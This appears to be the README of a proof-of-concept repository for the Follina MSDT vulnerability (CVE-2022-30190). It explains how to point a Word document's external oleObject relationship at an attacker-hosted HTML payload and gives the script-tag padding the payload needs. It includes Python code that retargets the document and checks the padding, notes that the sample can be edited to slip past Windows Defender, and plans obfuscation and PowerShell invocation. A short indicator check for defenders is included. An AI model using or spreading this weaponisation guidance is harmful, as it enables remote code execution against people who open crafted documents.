CVE-2022-30190-follina

Just another PoC for the new MSDT exploit (CVE-2022-30190, "Follina").

To edit the document, open the .docx with 7z, xarchiver or any other zip tool and change the external Target in word/_rels/document.xml.rels so that it points at your IP (the URL where you host the HTML payload).

The HTML payload must contain at least 3541 characters of padding before the window.location.href assignment, and that padding must sit inside the script tag. The current file carries about 9000, just to be safe.
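The two edits above (retargeting the external relationship in word/_rels/document.xml.rels, and checking the padding inside the script tag) can be done and verified from a script instead of by hand. The following is an added example and not code from this repository; it uses only the Python standard library, builds a constructed minimal .docx in memory (only the parts needed for the relationship file), and uses placeholder URLs from the RFC 5737 documentation ranges. The 3541-character threshold is the one stated in this README.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
RELS_PATH = "word/_rels/document.xml.rels"
OLE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
            "relationships/oleObject")
MIN_PADDING = 3541  # minimum stated in this README


def build_sample_docx() -> bytes:
    """Constructed minimal package: one internal rel and one external
    oleObject rel pointing at a placeholder (documentation) IP."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{OLE_TYPE}" '
        'Target="http://192.0.2.10/payload.html" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PATH, rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """List (Id, Type, Target) of every relationship with TargetMode
    External. A remote http(s) oleObject target is what this PoC relies on
    and is also what a defender should look for."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read(RELS_PATH))
    return [
        (rel.get("Id"), rel.get("Type"), rel.get("Target"))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship")
        if rel.get("TargetMode") == "External"
    ]


def retarget(docx_bytes: bytes, rel_id: str, new_target: str) -> bytes:
    """Rewrite the Target of one relationship, i.e. the manual 7z edit,
    and return a new .docx with every other zip entry copied unchanged."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    root = ET.fromstring(src.read(RELS_PATH))
    hits = [r for r in root.iter(f"{{{RELS_NS}}}Relationship")
            if r.get("Id") == rel_id]
    if not hits:
        raise KeyError(f"no relationship with Id {rel_id}")
    for rel in hits:
        rel.set("Target", new_target)
    ET.register_namespace("", RELS_NS)  # keep the default namespace on output
    new_rels = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = new_rels if item.filename == RELS_PATH else src.read(item)
            dst.writestr(item, data)
    src.close()
    return out.getvalue()


def script_padding_before_redirect(html: str):
    """Number of characters between the end of the first <script> tag and
    the first window.location.href after it; None if either is missing."""
    script = re.search(r"<script\b[^>]*>", html, re.IGNORECASE)
    if not script:
        return None
    href = re.search(r"window\.location\.href", html[script.end():])
    return href.start() if href else None


def payload_meets_minimum(html: str) -> bool:
    """True when the padding requirement stated in this README is met."""
    n = script_padding_before_redirect(html)
    return n is not None and n >= MIN_PADDING


if __name__ == "__main__":
    doc = build_sample_docx()
    print(external_relationships(doc))
    doc2 = retarget(doc, "rId5", "http://198.51.100.7/payload.html")
    print(external_relationships(doc2))
    html = "<script>" + "<!--" + "A" * 9000 + "-->" + \
        "window.location.href = 'x';</script>"
    print(script_padding_before_redirect(html), payload_meets_minimum(html))
```

The same external_relationships check works on any .docx from the wild: a relationship of type oleObject with TargetMode="External" and an http or https Target is the indicator to triage, independent of the payload's final URL.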

More about the exploit:

https://www.borncity.com/blog/2022/06/01/follina-schwachstelle-cve-2022-30190-warnungen-erste-angriffe-der-status/ (German)
https://packetstormsecurity.com/files/167317/msdt-poc.txt

Mitigation and workaround:

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Windows Defender already detects this sample (as Trojan:Win32/Mesdetty.D), so you will have to edit the file if it gets flagged.

REMEMBER: ONLY FOR EDUCATIONAL PURPOSES!!! ;)

To-Do:

  • Obfuscation
  • Invoke a PowerShell script